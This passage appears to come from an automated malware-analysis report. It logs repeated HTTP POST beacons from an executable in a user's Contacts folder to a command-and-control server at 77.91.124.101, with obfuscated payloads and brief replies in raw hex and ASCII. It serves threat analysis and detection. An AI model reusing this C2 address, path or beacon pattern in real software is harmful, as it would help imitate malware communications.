                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:41.532224894 CET604INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:41.532480001 CET606OUTData Raw: 52 58 58 59 5b 5f 5f 59 5d 57 55 57 55 5d 57 56 50 52 58 47 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXXY[__Y]WUWU]WVPRXGVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=>?>V*#88'2\45(#='>&' .S,(*(?(->&G''^)+
                                                            Nov 21, 2023 04:48:41.736088991 CET607INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:41 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11277.91.124.10180192.168.2.549827C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:41.333384037 CET604OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:41.532224894 CET604INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:41.532480001 CET606OUTData Raw: 52 58 58 59 5b 5f 5f 59 5d 57 55 57 55 5d 57 56 50 52 58 47 56 55 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXXY[__Y]WUWU]WVPRXGVUW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=>?>V*#88'2\45(#='>&' .S,(*(?(->&G''^)+
                                                            Nov 21, 2023 04:48:41.736088991 CET607INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:41 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            113192.168.2.54982877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:42.070585966 CET608OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:42.268085957 CET608INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:42.268487930 CET610OUTData Raw: 57 50 5d 5a 5b 5d 5f 5a 5d 57 55 57 55 5b 57 53 50 53 58 48 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]Z[]_Z]WUWU[WSPSXHV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\']=81Y?>=;7:=?%$-*S'"T-_?<;^,&G''^)3
                                                            Nov 21, 2023 04:48:42.472783089 CET611INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:42 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11377.91.124.10180192.168.2.549828C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:42.070585966 CET608OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:42.268085957 CET608INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:42.268487930 CET610OUTData Raw: 57 50 5d 5a 5b 5d 5f 5a 5d 57 55 57 55 5b 57 53 50 53 58 48 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]Z[]_Z]WUWU[WSPSXHV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\']=81Y?>=;7:=?%$-*S'"T-_?<;^,&G''^)3
                                                            Nov 21, 2023 04:48:42.472783089 CET611INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:42 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11477.91.124.10180192.168.2.549829C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:42.804671049 CET612OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:43.003443956 CET612INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:43.004524946 CET614OUTData Raw: 52 5c 5d 5d 5b 59 5a 5f 5d 57 55 57 55 5b 57 51 50 5a 58 42 56 56 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\]][YZ_]WUWU[WQPZXBVVWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\>-<;"U)3,'2_ :( =$.>S&#>R.+*_?7,.&G''^)3
                                                            Nov 21, 2023 04:48:43.210524082 CET615INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:42 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            114192.168.2.54982977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:42.804671049 CET612OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:43.003443956 CET612INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:43.004524946 CET614OUTData Raw: 52 5c 5d 5d 5b 59 5a 5f 5d 57 55 57 55 5b 57 51 50 5a 58 42 56 56 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\]][YZ_]WUWU[WQPZXBVVWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\>-<;"U)3,'2_ :( =$.>S&#>R.+*_?7,.&G''^)3
                                                            Nov 21, 2023 04:48:43.210524082 CET615INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:42 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11577.91.124.10180192.168.2.549830C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:43.542810917 CET616OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:43.744493961 CET616INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:43.744719028 CET618OUTData Raw: 52 5f 58 5e 5b 59 5a 5d 5d 57 55 57 55 5a 57 5a 50 58 58 48 56 52 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X^[YZ]]WUWUZWZPXXHVRW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*<+>S*#',B1"96+0*'-)$#&-;*<,/.&G''^)7
                                                            Nov 21, 2023 04:48:43.947633028 CET619INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:43 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            115192.168.2.54983077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:43.542810917 CET616OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:43.744493961 CET616INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:43.744719028 CET618OUTData Raw: 52 5f 58 5e 5b 59 5a 5d 5d 57 55 57 55 5a 57 5a 50 58 58 48 56 52 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X^[YZ]]WUWUZWZPXXHVRW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_*<+>S*#',B1"96+0*'-)$#&-;*<,/.&G''^)7
                                                            Nov 21, 2023 04:48:43.947633028 CET619INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:43 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            116192.168.2.54983177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:44.269886017 CET620OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:44.469629049 CET620INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:44.470208883 CET622OUTData Raw: 52 5f 58 5b 5b 5e 5f 5e 5d 57 55 57 55 5a 57 55 50 5f 58 45 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X[[^_^]WUWUZWUP_XEV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^==Y=;!>#3,4]4:=\+%3V$ 9,(*(+,&G''^)7
                                                            Nov 21, 2023 04:48:44.675368071 CET623INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:44 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11677.91.124.10180192.168.2.549831C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:44.269886017 CET620OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:44.469629049 CET620INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:44.470208883 CET622OUTData Raw: 52 5f 58 5b 5b 5e 5f 5e 5d 57 55 57 55 5a 57 55 50 5f 58 45 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_X[[^_^]WUWUZWUP_XEV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^==Y=;!>#3,4]4:=\+%3V$ 9,(*(+,&G''^)7
                                                            Nov 21, 2023 04:48:44.675368071 CET623INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:44 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11777.91.124.10180192.168.2.549832C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:45.006195068 CET623OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:45.203978062 CET624INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:45.355977058 CET625INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            117192.168.2.54983277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:45.006195068 CET623OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:45.203978062 CET624INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:45.355977058 CET625INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            118192.168.2.54983377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:45.353457928 CET624OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:45.553359032 CET626INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:45.553590059 CET627OUTData Raw: 52 58 5d 59 5b 5d 5f 59 5d 57 55 57 55 5a 57 57 50 5a 58 43 56 53 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RX]Y[]_Y]WUWUZWWPZXCVSWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*+1^(;==3^;$97%]?U='-Q$ 1:]=??#_/>&G''^)7
                                                            Nov 21, 2023 04:48:45.755808115 CET630INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 5d 32 01 38 58 37 30 37 1d 2b 14 2e 0e 39 3e 3e 45 28 33 22 06 27 2e 3b 02 33 29 39 51 3d 2c 3f 00 33 3a 2c 57 20 36 3f 04 2b 20 21 5a 0c 1d 26 5c 36 3b 27 54 3f 58 3c 58 29 3e 23 02 32 0f 27 5e 3c 07 33 16 34 30 38 00 26 33 28 50 2e 3f 2d 5f 2f 3b 32 0b 31 02 2d 00 23 3d 23 5f 0c 14 24 0c 21 0f 2c 00 22 23 3a 12 23 27 16 14 37 37 37 1e 33 3d 0e 55 25 06 29 1a 3c 38 0a 53 32 34 27 0d 30 14 3c 0a 25 00 23 13 3c 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "]28X707+.9>>E(3"'.;3)9Q=,?3:,W 6?+ !Z&\6;'T?X<X)>#2'^<3408&3(P.?-_/;21-#=#_$!,"#:#'7773=U%)<8S24'0<%#<:&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11877.91.124.10180192.168.2.549833C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:45.353457928 CET624OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:45.553359032 CET626INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:45.553590059 CET627OUTData Raw: 52 58 5d 59 5b 5d 5f 59 5d 57 55 57 55 5a 57 57 50 5a 58 43 56 53 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RX]Y[]_Y]WUWUZWWPZXCVSWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*+1^(;==3^;$97%]?U='-Q$ 1:]=??#_/>&G''^)7
                                                            Nov 21, 2023 04:48:45.755808115 CET630INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
